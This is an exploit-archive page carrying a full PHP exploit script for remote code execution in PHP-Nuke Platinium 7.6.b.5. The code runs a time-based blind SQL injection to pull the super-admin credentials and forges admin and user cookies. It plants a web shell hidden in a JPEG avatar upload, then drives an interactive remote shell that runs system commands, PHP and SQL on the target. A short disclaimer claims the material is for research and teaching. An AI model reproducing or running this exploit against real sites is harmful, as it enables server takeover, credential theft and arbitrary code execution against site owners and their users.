PHP-Nuke Platinium <= 7.6.b.5 Remote Code Execution Exploit
Published:2008-07-01
Exploit:
[www.sebug.net]
The following procedures (methods) may contain something offensive,they are only for security researches and teaching , at your own risk!
The following procedures (methods) may contain something offensive,they are only for security researches and teaching , at your own risk!
<?php
##
## PHP Nuke Platinium <= 7.6.b.5 Remote Code Execution Exploit
## Author: Charles "real" F. <charlesfol[at]hotmail.fr>
## Date: 02/07/08
##
## Note
## ****
## I modified a bit phpsploit for this exploit,
## because PHP Nuke plays with REQUEST_URI var ...
##
## Requirements
## ************
## register_globals=On
##
## phpreter
## ********
## phpreter is really easy to use:
## You can change mode using "mode=<mode>",
## with <mode> = sql, php or cmd
##
## If you want to understand how it work ...
## read the code.
##
## You can take look to unchunk() function, because
## I think you were many with this problem ...
##
#
# Configuration
#
$xpl = new phpsploit();
$xpl->agent('Mozilla/5.0 (Windows; U; Windows NT 6.0; fr; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14');
print "##\n";
print "## PHP Nuke Platinium 7.6.b.5\n";
print "## Remote Code Execution Exploit\n";
print "## by Charles <real> F. <charlesfol[at]hotmail.fr>\n";
print "## [http://realn.free.fr/]\n";
print "##\n";
if($argc<3)
{
print "##--- USAGE -----------------------------------------------\n";
print "## [c:\]# php nuke_platinium_exploit.php [options]\n";
print "##\n";
print "## -url Target URL\n";
print "## -shell If you only wan't to load again phpreter,\n";
print "## specify with this param your shell URL\n";
print "## -account A GOD admin account (optional)\n";
print "## password can be md5 or plain text\n";
print "## user:passwd\n";
print "## -bmark In seconds, how many time must pass\n";
print "## to consider query returned true (optional)\n";
print "##\n";
print "## eg:\n";
print "## ./exploit.php -url http://target.net/ -admin god:pwd\n";
print "## ./exploit.php -shell http://target.net/tmp_1339.php\n";
print "##---------------------------------------------------------\n";
exit();
}
# Parameters
$url = getparam('url');
$shell_url = getparam('shell');
$account = getparam('account') ? getparam('account') : '';
$bmark_time = getparam('bmark') ? getparam('bmark') : 4;
if(!$url && !$shell_url)
{
print "## Ok dude, are you an idiot ?\n";
exit();
}
# SQL Configuration for phpreter
$sql = array(
'config.php',
'$dbhost',
'$dbuname',
'$dbpass',
'$dbname',
);
if($shell_url)
{
print "##--- SHELL -----------------------------------------------\n";
print "## URL: $shell_url\n";
print "##---------------------------------------------------------\n";
$shell = new phpreter($shell_url, '-:-(.*)-:-', 'cmd', $sql, false);
exit();
}
if(!preg_match('#ORDER by date#',$xpl->post($url.'includes/pdf.php',"what=getpdf&table=_blocked_iplist '-")))
{
print "## register_globals=Off, exiting.\n";
print "##\n";
exit();
}
#
# Admin credentials
#
if(!empty($account))
{
list($aid, $pwd) = explode(':',$account);
if(!preg_match('#[a-f0-9]{32}#i',$pwd)) $pwd = md5($pwd);
}
print "##--- ADMIN -----------------------------------------------\n";
print "## Admin ID: ";
isset($aid) ? print $aid."\n" : $aid = bmark('aid','abcdefghijklmnopqrstuvwxyz0123456789');
print "## Password: ";
isset($pwd) ? print $pwd."\n" : $pwd = bmark('pwd','abcdef0123456789');
print "##---------------------------------------------------------\n";
print "##\n";
#
# User data
#
# We set up admin access
$c_admin = base64_encode($aid.':'.$pwd);
$xpl->addcookie('admin', urlencode($c_admin));
# Ok, now, we need an user for the upload
$query = "SELECT CONCAT(0x3a3a3a,user_id,0x3a,username,0x3a,user_email,0x3a,user_password,0x3a3a3a) FROM nuke_users ORDER BY user_id DESC LIMIT 1";
$data = sqlexec($query);
$data = explode(':::',$data);
list($user_id, $user_name, $user_mail, $user_pwd) = explode(':',$data[1]);
$c_user = base64_encode($user_id.':'.$user_name.':'.$user_pwd);
$xpl->addcookie('user', urlencode($c_user));
# We need a valid SID
$xpl->get($url.'modules.php?name=Forums&file=profile&mode=editprofile');
preg_match('#sid" value="([a-f0-9]{32})#i', $xpl->getcontent(), $c_sid);
$c_sid = $c_sid[1];
$xpl->addcookie('_sid',$c_sid);
print "##--- USER ------------------------------------------------\n";
print "## User ID : ".$user_id."\n";
print "## Name : ".$user_name."\n";
print "## Mail : ".$user_mail."\n";
print "## Password: ".$user_pwd."\n";
print "##---------------------------------------------------------\n";
print "##\n";
#
# Cookies
#
print "##--- COOKIES -----------------------------------\n";
print "## user=".$c_user."\n";
print "## admin=".$c_admin."\n";
print "##---------------------------------------------------------\n";
print "##\n";
#
# File upload
#
print "## Uploading the file ";
$rand_filename = 'tmp_'.rand().'.php';
# Step #1: avatar_path='w00t.php\0'
sqlexec("UPDATE nuke_bbconfig SET config_value='$rand_filename\\0' WHERE config_name='avatar_path'");
print ".";
# Step #2: JPEG upload (bypassing restrictions)
# $c0de contains as a jpeg comment
# print '-:-';eval(stripslashes($_SERVER['HTTP_SHELL']));print '-:-';
#
# To people who is laughing to me when I stripslashes() the header:
# On specifics servers, HTTP headers are addslashed.
# This gave, in fact, the attack #2 in my Nuked-Klan sploit.
#
$c0de = ""
. "\xff\xd8\xff\xe0\x00\x10\x4a\x46\x49\x46\x00\x01\x01\x01\x00\x60"
. "\x00\x60\x00\x00\xff\xdb\x00\x43\x00\x08\x06\x06\x07\x06\x05\x08"
. "\x07\x07\x07\x09\x09\x08\x0a\x0c\x14\x0d\x0c\x0b\x0b\x0c\x19\x12"
. "\x13\x0f\x14\x1d\x1a\x1f\x1e\x1d\x1a\x1c\x1c\x20\x24\x2e\x27\x20"
. "\x22\x2c\x23\x1c\x1c\x28\x37\x29\x2c\x30\x31\x34\x34\x34\x1f\x27"
. "\x39\x3d\x38\x32\x3c\x2e\x33\x34\x32\xff\xdb\x00\x43\x01\x09\x09"
. "\x09\x0c\x0b\x0c\x18\x0d\x0d\x18\x32\x21\x1c\x21\x32\x32\x32\x32"
. "\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
. "\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
. "\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\xff\xfe"
. "\x00\x4e\x3c\x3f\x70\x68\x70\x20\x70\x72\x69\x6e\x74\x20\x27\x2d"
. "\x3a\x2d\x27\x3b\x65\x76\x61\x6c\x28\x73\x74\x72\x69\x70\x73\x6c"
. "\x61\x73\x68\x65\x73\x28\x24\x5f\x53\x45\x52\x56\x45\x52\x5b\x27"
. "\x48\x54\x54\x50\x5f\x53\x48\x45\x4c\x4c\x27\x5d\x29\x29\x3b\x70"
. "\x72\x69\x6e\x74\x20\x27\x2d\x3a\x2d\x27\x3b\x20\x3f\x3e\xff\xc0"
. "\x00\x11\x08\x00\x01\x00\x01\x03\x01\x22\x00\x02\x11\x01\x03\x11"
. "\x01\xff\xc4\x00\x1f\x00\x00\x01\x05\x01\x01\x01\x01\x01\x01\x00"
. "\x00\x00\x00\x00\x00\x00\x00\x01\x02\x03\x04\x05\x06\x07\x08\x09"
. "\x0a\x0b\xff\xc4\x00\xb5\x10\x00\x02\x01\x03\x03\x02\x04\x03\x05"
. "\x05\x04\x04\x00\x00\x01\x7d\x01\x02\x03\x00\x04\x11\x05\x12\x21"
. "\x31\x41\x06\x13\x51\x61\x07\x22\x71\x14\x32\x81\x91\xa1\x08\x23"
. "\x42\xb1\xc1\x15\x52\xd1\xf0\x24\x33\x62\x72\x82\x09\x0a\x16\x17"
. "\x18\x19\x1a\x25\x26\x27\x28\x29\x2a\x34\x35\x36\x37\x38\x39\x3a"
. "\x43\x44\x45\x46\x47\x48\x49\x4a\x53\x54\x55\x56\x57\x58\x59\x5a"
. "\x63\x64\x65\x66\x67\x68\x69\x6a\x73\x74\x75\x76\x77\x78\x79\x7a"
. "\x83\x84\x85\x86\x87\x88\x89\x8a\x92\x93\x94\x95\x96\x97\x98\x99"
. "\x9a\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xb2\xb3\xb4\xb5\xb6\xb7"
. "\xb8\xb9\xba\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xd2\xd3\xd4\xd5"
. "\xd6\xd7\xd8\xd9\xda\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xf1"
. "\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xff\xc4\x00\x1f\x01\x00\x03"
. "\x01\x01\x01\x01\x01\x01\x01\x01\x01\x00\x00\x00\x00\x00\x00\x01"
. "\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\xff\xc4\x00\xb5\x11\x00"
. "\x02\x01\x02\x04\x04\x03\x04\x07\x05\x04\x04\x00\x01\x02\x77\x00"
. "\x01\x02\x03\x11\x04\x05\x21\x31\x06\x12\x41\x51\x07\x61\x71\x13"
. "\x22\x32\x81\x08\x14\x42\x91\xa1\xb1\xc1\x09\x23\x33\x52\xf0\x15"
. "\x62\x72\xd1\x0a\x16\x24\x34\xe1\x25\xf1\x17\x18\x19\x1a\x26\x27"
. "\x28\x29\x2a\x35\x36\x37\x38\x39\x3a\x43\x44\x45\x46\x47\x48\x49"
. "\x4a\x53\x54\x55\x56\x57\x58\x59\x5a\x63\x64\x65\x66\x67\x68\x69"
. "\x6a\x73\x74\x75\x76\x77\x78\x79\x7a\x82\x83\x84\x85\x86\x87\x88"
. "\x89\x8a\x92\x93\x94\x95\x96\x97\x98\x99\x9a\xa2\xa3\xa4\xa5\xa6"
. "\xa7\xa8\xa9\xaa\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xc2\xc3\xc4"
. "\xc5\xc6\xc7\xc8\xc9\xca\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xe2"
. "\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9"
. "\xfa\xff\xda\x00\x0c\x03\x01\x00\x02\x11\x03\x11\x00\x3f\x00\xf7"
. "\xfa\x28\xa2\x80\x3f\xff\xd9\xd9";
$data = array(
frmdt_url => $url.'modules.php?name=Forums&file=profile',
'avatar' => array(frmdt_filename => '1.jpg', frmdt_type => 'image/jpeg', frmdt_content => $c0de),
'username' => $user_name, 'email' => $user_mail,
'cur_password' => '', 'new_password' => '',
'password_confirm' => '', 'icq' => '',
'aim' => '', 'msn' => '',
'yim' => '', 'website' => '',
'location' => '', 'occupation' => '',
'interests' => '', 'b_day' => '1',
'b_md' => '1', 'b_year' => '1111',
'gender' => '1', 'viewemail' => '0',
'hideonline' => '1', 'notifyreply' => '0',
'notifypm' => '0', 'popup_pm' => '0',
'attachsig' => '1', 'allowbbcode' => '1',
'allowhtml' => '1', 'allowsmilies' => '1',
'showquickreply' => '0', 'user_wordwrap' => '70',
'language' => 'english', 'style' => '1',
'timezone' => '-6', 'dateformat' => 'Y-m-d, H:i:s',
'MAX_FILE_SIZE' => '99999', 'avatarurl' => '',
'avatarremoteurl' => '', 'mode' => 'editprofile',
'agreed' => 'true', 'coppa' => '0',
'sid' => $c_sid, 'user_id' => $user_id,
'current_email' => $user_mail, 'submit' => 'Submit',
);
$xpl->formdata($data);
print ".";
# Step #3: avatar_path='modules/Forums/images/avatars'
sqlexec("UPDATE nuke_bbconfig SET config_value='modules/Forums/images/avatars' WHERE config_name='avatar_path'");
print ".\n";
# Shell is uploaded, let's load it
$shell_url = $url.$rand_filename;
print "##\n";
print "##--- SHELL -----------------------------------------------\n";
print "## URL: $shell_url\n";
print "##---------------------------------------------------------\n";
$shell = new phpreter($shell_url, '-:-(.*)-:-', 'cmd', $sql, false);
#
# Execute SQL Queries
#
function sqlexec($query)
{
global $xpl,$url;
$xpl->post($url.'modules/Forums/admin/admin_genesismyadmin.php','this_query='.urlencode($query).'&submit=&with_selected=optimize');
return $xpl->getcontent();
}
#
# Bmark SQL Injection Function
#
function bmark($query,$charset)
{
global $xpl,$url,$data,$bmark_time;
$d=0; $v='';$max=32;
$query = 'SELECT '.$query.' FROM nuke_authors WHERE radminsuper=1 ORDER BY aid LIMIT 1';
$data = "what=getpdf&table=_blocked_iplist+WHERE+IF((<sql>),BENCHMARK($bmark_numb,MD5(0x616161)),1)=1 --";
while($d<$max)
{
$d++;
for($z=0;$z<strlen($charset);$z++)
{
$f = ord(substr($charset,$z,1));
$sql = "MID(($query),$d,1)=CHAR($f)";
$date = time();
$xpl->post($url."includes/pdf.php", str_replace('<sql>',$sql,$data) );
if(time()-$date>$bmark_time)
{
print strtolower(chr($f));
$v .= chr($f);
break;
}
}
if(strlen($v)==$save) break;
$save = strlen($v);
}
print "\n";
return $v;
}
function getparam($param,$opt='')
{
global $argv;
foreach($argv as $value => $key)
{
if($key == '-'.$param) return $argv[$value+1];
}
if($opt) exit("\n-$param parameter required");
else return;
}
/*
* Copyright (c) real
*
* This program is free software; you can redistribute it and/or
* modify it under the terms of the GNU General Public License
* as published by the Free Software Foundation; either version 2
* of the License, or (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program; if not, write to the Free Software
* Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.
*
* TITLE: PHPreter
* AUTHOR: Charles "real" F.
* VERSION: 1.0
* LICENSE: GNU General Public License
*
* This is a really simple class with permits to exec SQL, PHP or CMD
* on a remote host using the HTTP "Shell" header.
*
*/
class phpreter
{
var $url;
var $host;
var $port;
var $page;
var $mode;
var $ssql;
var $prompt;
var $phost;
var $regex;
var $data;
/**
* __construct()
*
* @param url The url of the remote shell.
* @param regexp The regex to catch cmd result.
* @param mode Mode: php, sql or cmd.
* @param sql An array with the file to include,
* and sql vars
* @param clear Determines if clear() is called
* on startup
*/
function __construct($url, $regexp='^(.*)$', $mode='cmd', $sql=array(), $clear=true)
{
$this->url = $url;
$this->regex = '#'.$regexp.'#is';
#
# Set important data
#
$infos = parse_url($this->url);
$this->host = $infos['host'];
$this->port = isset($infos['port']) ? $infos['port'] : 80;
$this->page = $infos['path'];
unset($infos);
# www.(site).com
$host_tmp = explode('.',$this->host);
$this->phost = $host_tmp[ count($host_tmp)-2 ];
unset($host_tmp);
#
# Set up MySQL connection string
#
if(!sizeof($sql)) $this->ssql = '';
elseif(sizeof($sql)==5)
{
$this->ssql = "include('$sql[0]');"
. "mysql_connect($sql[1], $sql[2], $sql[3]);"
. "mysql_select_db($sql[4]);";
}
else
{
$this->ssql = ""
. "mysql_connect('$sql[0]', '$sql[1]', '$sql[2]');"
. "mysql_select_db('$sql[3]');";
}
$this->setmode($mode);
#
# Main Loop
#
if($clear) $this->clear();
print $this->prompt;
while(!preg_match('#^(quit|exit|close)$#i',($cmd = trim(fgets(STDIN)))))
{
# change mode
if(preg_match('#^(set )?mode(=| )(sql|cmd|php)$#i',$cmd,$array)) $this->setmode($array[3]);
# clear data
elseif(preg_match('#^clear$#i',$cmd)) $this->clear();
# else
else print $this->exec($cmd);
print $this->prompt;
}
}
/**
* clear()
* Just clears ouput, printing '\n'x50
*/
function clear()
{
print str_repeat("\n",50);
return 0;
}
/**
* setmode()
* Set mode (PHP, CMD, SQL)
* You don't have to call it.
* use mode=[php|cmd|sql] instead,
* in the prompt.
*/
function setmode($newmode)
{
$this->mode = strtolower($newmode);
$this->prompt = '['.$this->phost.']['.$this->mode.']# ';
switch($this->mode)
{
case 'cmd':
$this->data = 'system(\'<CMD>\');';
break;
case 'php':
$this->data = '';
break;
case 'sql':
$this->data = $this->ssql
. '$q = mysql_query(\'<CMD>\') or print(mysql_error());'
. 'print str_repeat("-",50)."\n";'
. 'while($r=mysql_fetch_array($q,MYSQL_ASSOC))'
. '{'
. 'foreach($r as $k=>$v) print " ".$k.str_repeat(" ", (20-strlen($k)))."| $v\n";'
. 'print str_repeat("-",50)."\n";'
. '}';
break;
}
return $this->mode;
}
/**
* exec()
* Execute any query and catch the result.
* You don't have to call it.
*/
function exec($cmd)
{
if(!strlen($this->data)) $shell = $cmd;
else $shell = str_replace('<CMD>',addslashes($cmd),$this->data);
$fp = fsockopen($this->host, $this->port, &$errno, &$errstr, 30);
$req = "GET ".$this->page." HTTP/1.1\r\n";
$req .= "Host: ". $this->host . ( $this->port!=80 ? ':'.$this->port : '' ) ."\r\n";
$req .= "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; fr; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14\r\n";
$req .= "Shell: $shell\r\n";
$req .= "Content-transfert-encoding: base64\r\n";
$req .= "Connection: close\r\n\r\n";
unset($shell);
fputs($fp,$req);
$content = '';
while(!feof($fp)) $content .= fgets($fp,128);
fclose($fp);
# Remove headers
$data = explode("\r\n\r\n",$content);
array_shift($data);
$content = implode("\r\n\r\n",$data);
$content = $this->unchunk($content);
preg_match($this->regex,$content,$data);
if($data[1][ strlen($data)-1 ] != "\n") $data[1] .= "\n";
return $data[1];
}
/**
* unchunk()
* This function aims to remove chunked content sizes which
* are putted by apache server when it uses chunked
* transfert-encoding.
*/
function unchunk($data)
{
$dsize = 1;
$offset = 0;
while($dsize>0)
{
$hsize_size = strpos($data, "\r\n", $offset) - $offset;
$hsize = substr($data, $offset, $hsize_size);
$dsize = hexdec($hsize);
/*
print "offset (dec) = $offset\n";
print "hsize (hex) = $hsize\n";
print "dsize (dec) = $dsize\n";
print "crlfp (dec) = $hsize_size\n";
print "--\n";
*/
# Remove $hsize\r\n from $data
$data = substr($data, 0, $offset) . substr($data, ($offset + $hsize_size + 2) );
$offset += $dsize;
# Remove the \r\n before the next $hsize
$data = substr($data, 0, $offset) . substr($data, ($offset+2) );
}
return $data;
}
}
/*
*
* Copyright (C) darkfig
*
* This program is free software; you can redistribute it and/or
* modify it under the terms of the GNU General Public License
* as published by the Free Software Foundation; either version 2
* of the License, or (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program; if not, write to the Free Software
* Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.
*
* TITLE: PhpSploit Class
* REQUIREMENTS: PHP 4 / PHP 5
* VERSION: 2.0
* LICENSE: GNU General Public License
* ORIGINAL URL: http://www.acid-root.new.fr/tools/03061230.txt
* FILENAME: phpsploitclass.php
*
* CONTACT: gmdarkfig@gmail.com (french / english)
* GREETZ: Sparah, Ddx39
*
* DESCRIPTION:
* The phpsploit is a class implementing a web user agent.
* You can add cookies, headers, use a proxy server with (or without) a
* basic authentification. It supports the GET and the POST method. It can
* also be used like a browser with the cookiejar() function (which allow
* a server to add several cookies for the next requests) and the
* allowredirection() function (which allow the script to follow all
* redirections sent by the server). It can return the content (or the
* headers) of the request. Others useful functions can be used for debugging.
* A manual is actually in development but to know how to use it, you can
* read the comments.
*
* CHANGELOG:
*
* [2007-06-10] (2.0)
* * Code: Code optimization
* * New: Compatible with PHP 4 by default
*
* [2007-01-24] (1.2)
* * Bug #2 fixed: Problem concerning the getcookie() function ((|;))
* * New: multipart/form-data enctype is now supported
*
* [2006-12-31] (1.1)
* * Bug #1 fixed: Problem concerning the allowredirection() function (chr(13) bug)
* * New: You can now call the getheader() / getcontent() function without parameters
*
* [2006-12-30] (1.0)
* * First version
*
*/
class phpsploit
{
var $proxyhost;
var $proxyport;
var $host;
var $path;
var $port;
var $method;
var $url;
var $packet;
var $proxyuser;
var $proxypass;
var $header;
var $cookie;
var $data;
var $boundary;
var $allowredirection;
var $last_redirection;
var $cookiejar;
var $recv;
var $cookie_str;
var $header_str;
var $server_content;
var $server_header;
/**
* This function is called by the
* get()/post()/formdata() functions.
* You don't have to call it, this is
* the main function.
*
* @access private
* @return string $this->recv ServerResponse
*
*/
function sock()
{
if(!empty($this->proxyhost) && !empty($this->proxyport))
$socket = @fsockopen($this->proxyhost,$this->proxyport);
else
$socket = @fsockopen($this->host,$this->port);
if(!$socket)
die("Error: Host seems down");
# modification (by real)
preg_match("#^http://[^/]+(/.*)$#i", $this->url, $tmp);
$tmp = $tmp[1];
if($this->method=='get')
$this->packet = 'GET '.$tmp." HTTP/1.1\r\n";
elseif($this->method=='post' or $this->method=='formdata')
$this->packet = 'POST '.$tmp." HTTP/1.1\r\n";
else
die("Error: Invalid method");
if(!empty($this->proxyuser))
$this->packet .= 'Proxy-Authorization: Basic '.base64_encode($this->proxyuser.':'.$this->proxypass)."\r\n";
if(!empty($this->header))
$this->packet .= $this->showheader();
if(!empty($this->cookie))
$this->packet .= 'Cookie: '.$this->showcookie()."\r\n";
$this->packet .= 'Host: '.$this->host."\r\n";
$this->packet .= "Connection: Close\r\n";
if($this->method=='post')
{
$this->packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
$this->packet .= 'Content-Length: '.strlen($this->data)."\r\n\r\n";
$this->packet .= $this->data."\r\n";
}
elseif($this->method=='formdata')
{
$this->packet .= 'Content-Type: multipart/form-data; boundary='.str_repeat('-',27).$this->boundary."\r\n";
$this->packet .= 'Content-Length: '.strlen($this->data)."\r\n\r\n";
$this->packet .= $this->data;
}
$this->packet .= "\r\n";
$this->recv = '';
fputs($socket,$this->packet);
while(!feof($socket))
$this->recv .= fgets($socket);
fclose($socket);
if($this->cookiejar)
$this->getcookie();
if($this->allowredirection)
return $this->getredirection();
else
return $this->recv;
}
/**
* This function allows you to add several
* cookies in the request.
*
* @access public
* @param string cookn CookieName
* @param string cookv CookieValue
* @example $this->addcookie('name','value')
*
*/
function addcookie($cookn,$cookv)
{
if(!isset($this->cookie))
$this->cookie = array();
$this->cookie[$cookn] = $cookv;
}
/**
* This function allows you to add several
* headers in the request.
*
* @access public
* @param string headern HeaderName
* @param string headervalue Headervalue
* @example $this->addheader('Client-IP', '128.5.2.3')
*
*/
function addheader($headern,$headervalue)
{
if(!isset($this->header))
$this->header = array();
$this->header[$headern] = $headervalue;
}
/**
* This function allows you to use an
* http proxy server. Several methods
* are supported.
*
* @access public
* @param string proxy ProxyHost
* @param integer proxyp ProxyPort
* @example $this->proxy('localhost',8118)
* @example $this->proxy('localhost:8118')
*
*/
function proxy($proxy,$proxyp='')
{
if(empty($proxyp))
{
$proxarr = explode(':',$proxy);
$this->proxyhost = $proxarr[0];
$this->proxyport = (int)$proxarr[1];
}
else
{
$this->proxyhost = $proxy;
$this->proxyport = (int)$proxyp;
}
if($this->proxyport > 65535)
die("Error: Invalid port number");
}
/**
* This function allows you to use an
* http proxy server which requires a
* basic authentification. Several
* methods are supported:
*
* @access public
* @param string proxyauth ProxyUser
* @param string proxypass ProxyPass
* @example $this->proxyauth('user','pwd')
* @example $this->proxyauth('user:pwd');
*
*/
function proxyauth($proxyauth,$proxypass='')
{
if(empty($proxypass))
{
$posvirg = strpos($proxyauth,':');
$this->proxyuser = substr($proxyauth,0,$posvirg);
$this->proxypass = substr($proxyauth,$posvirg+1);
}
else
{
$this->proxyuser = $proxyauth;
$this->proxypass = $proxypass;
}
}
/**
* This function allows you to set
* the 'User-Agent' header.
*
* @access public
* @param string useragent Agent
* @example $this->agent('Firefox')
*
*/
function agent($useragent)
{
$this->addheader('User-Agent',$useragent);
}
/**
* This function returns the headers
* which will be in the next request.
*
* @access public
* @return string $this->header_str Headers
* @example $this->showheader()
*
*/
function showheader()
{
$this->header_str = '';
if(!isset($this->header))
return;
foreach($this->header as $name => $value)
$this->header_str .= $name.': '.$value."\r\n";
return $this->header_str;
}
/**
* This function returns the cookies
* which will be in the next request.
*
* @access public
* @return string $this->cookie_str Cookies
* @example $this->showcookie()
*
*/
function showcookie()
{
$this->cookie_str = '';
if(!isset($this->cookie))
return;
foreach($this->cookie as $name => $value)
$this->cookie_str .= $name.'='.$value.'; ';
return $this->cookie_str;
}
/**
* This function returns the last
* formed http request.
*
* @access public
* @return string $this->packet HttpPacket
* @example $this->showlastrequest()
*
*/
function showlastrequest()
{
if(!isset($this->packet))
return;
else
return $this->packet;
}
/**
* This function sends the formed
* http packet with the GET method.
*
* @access public
* @param string url Url
* @return string $this->sock()
* @example $this->get('localhost/index.php?var=x')
* @example $this->get('http://localhost:88/tst.php')
*
*/
function get($url)
{
$this->target($url);
$this->method = 'get';
return $this->sock();
}
/**
* This function sends the formed
* http packet with the POST method.
*
* @access public
* @param string url Url
* @param string data PostData
* @return string $this->sock()
* @example $this->post('http://localhost/','helo=x')
*
*/
function post($url,$data)
{
$this->target($url);
$this->method = 'post';
$this->data = $data;
return $this->sock();
}
/**
* This function sends the formed http
* packet with the POST method using
* the multipart/form-data enctype.
*
* @access public
* @param array array FormDataArray
* @return string $this->sock()
* @example $formdata = array(
* frmdt_url => 'http://localhost/upload.php',
* frmdt_boundary => '123456', # Optional
* 'var' => 'example',
* 'file' => array(
* frmdt_type => 'image/gif', # Optional
* frmdt_transfert => 'binary' # Optional
* frmdt_filename => 'hello.php,
* frmdt_content => '<?php echo 1; ?>'));
* $this->formdata($formdata);
*
*/
function formdata($array)
{
$this->target($array[frmdt_url]);
$this->method = 'formdata';
$this->data = '';
if(!isset($array[frmdt_boundary]))
$this->boundary = 'phpsploit';
else
$this->boundary = $array[frmdt_boundary];
foreach($array as $key => $value)
{
if(!preg_match('#^frmdt_(boundary|url)#',$key))
{
$this->data .= str_repeat('-',29).$this->boundary."\r\n";
$this->data .= 'Content-Disposition: form-data; name="'.$key.'";';
if(!is_array($value))
{
$this->data .= "\r\n\r\n".$value."\r\n";
}
else
{
$this->data .= ' filename="'.$array[$key][frmdt_filename]."\";\r\n";
if(isset($array[$key][frmdt_type]))
$this->data .= 'Content-Type: '.$array[$key][frmdt_type]."\r\n";
if(isset($array[$key][frmdt_transfert]))
$this->data .= 'Content-Transfer-Encoding: '.$array[$key][frmdt_transfert]."\r\n";
$this->data .= "\r\n".$array[$key][frmdt_content]."\r\n";
}
}
}
$this->data .= str_repeat('-',29).$this->boundary."--\r\n";
return $this->sock();
}
/**
* This function returns the content
* of the server response, without
* the headers.
*
* @access public
* @param string code ServerResponse
* @return string $this->server_content
* @example $this->getcontent()
* @example $this->getcontent($this->get('http://localhost/'))
*
*/
function getcontent($code='')
{
if(empty($code))
$code = $this->recv;
$code = explode("\r\n\r\n",$code);
$this->server_content = '';
for($i=1;$i<count($code);$i++)
$this->server_content .= $code[$i];
return $this->server_content;
}
/**
* This function returns the headers
* of the server response, without
* the content.
*
* @access public
* @param string code ServerResponse
* @return string $this->server_header
* @example $this->getcontent()
* @example $this->getcontent($this->post('http://localhost/','1=2'))
*
*/
function getheader($code='')
{
if(empty($code))
$code = $this->recv;
$code = explode("\r\n\r\n",$code);
$this->server_header = $code[0];
return $this->server_header;
}
/**
* This function is called by the
* cookiejar() function. It adds the
* value of the "Set-Cookie" header
* in the "Cookie" header for the
* next request. You don't have to
* call it.
*
* @access private
* @param string code ServerResponse
*
*/
function getcookie()
{
foreach(explode("\r\n",$this->getheader()) as $header)
{
if(preg_match('/set-cookie/i',$header))
{
$fequal = strpos($header,'=');
$fvirgu = strpos($header,';');
// 12=strlen('set-cookie: ')
$cname = substr($header,12,$fequal-12);
$cvalu = substr($header,$fequal+1,$fvirgu-(strlen($cname)+12+1));
$this->cookie[trim($cname)] = trim($cvalu);
}
}
}
/**
* This function is called by the
* get()/post() functions. You
* don't have to call it.
*
* @access private
* @param string urltarg Url
* @example $this->target('http://localhost/')
*
*/
function target($urltarg)
{
if(!ereg('^http://',$urltarg))
$urltarg = 'http://'.$urltarg;
$urlarr = parse_url($urltarg);
$this->url = 'http://'.$urlarr['host'].$urlarr['path'];
if(isset($urlarr['query']))
$this->url .= '?'.$urlarr['query'];
$this->port = !empty($urlarr['port']) ? $urlarr['port'] : 80;
$this->host = $urlarr['host'];
if($this->port != '80')
$this->host .= ':'.$this->port;
if(!isset($urlarr['path']) or empty($urlarr['path']))
die("Error: No path precised");
$this->path = substr($urlarr['path'],0,strrpos($urlarr['path'],'/')+1);
if($this->port > 65535)
die("Error: Invalid port number");
}
/**
* If you call this function,
* the script will extract all
* 'Set-Cookie' headers values
* and it will automatically add
* them into the 'Cookie' header
* for all next requests.
*
* @access public
* @param integer code 1(enabled) 0(disabled)
* @example $this->cookiejar(0)
* @example $this->cookiejar(1)
*
*/
function cookiejar($code)
{
if($code=='0')
$this->cookiejar=FALSE;
elseif($code=='1')
$this->cookiejar=TRUE;
}
/**
* If you call this function,
* the script will follow all
* redirections sent by the server.
*
* @access public
* @param integer code 1(enabled) 0(disabled)
* @example $this->allowredirection(0)
* @example $this->allowredirection(1)
*
*/
function allowredirection($code)
{
if($code=='0')
$this->allowredirection=FALSE;
elseif($code=='1')
$this->allowredirection=TRUE;
}
/**
* This function is called if
* allowredirection() is enabled.
* You don't have to call it.
*
* @access private
* @return string $this->get('http://'.$this->host.$this->path.$this->last_redirection)
* @return string $this->get($this->last_redirection)
* @return string $this->recv;
*
*/
function getredirection()
{
if(preg_match('/(location|content-location|uri): (.*)/i',$this->getheader(),$codearr))
{
$this->last_redirection = trim($codearr[2]);
if(!ereg('://',$this->last_redirection))
return $this->get('http://'.$this->host.$this->path.$this->last_redirection);
else
return $this->get($this->last_redirection);
}
else
return $this->recv;
}
/**
* This function allows you
* to reset some parameters.
*
* @access public
* @param string func Param
* @example $this->reset('header')
* @example $this->reset('cookie')
* @example $this->reset()
*
*/
function reset($func='')
{
switch($func)
{
case 'header':
$this->header = array();
break;
case 'cookie':
$this->cookie = array();
break;
default:
$this->cookiejar = '';
$this->header = array();
$this->cookie = array();
$this->allowredirection = '';
break;
}
}
}
?>
// Sebug.net [ 2008-07-02 ]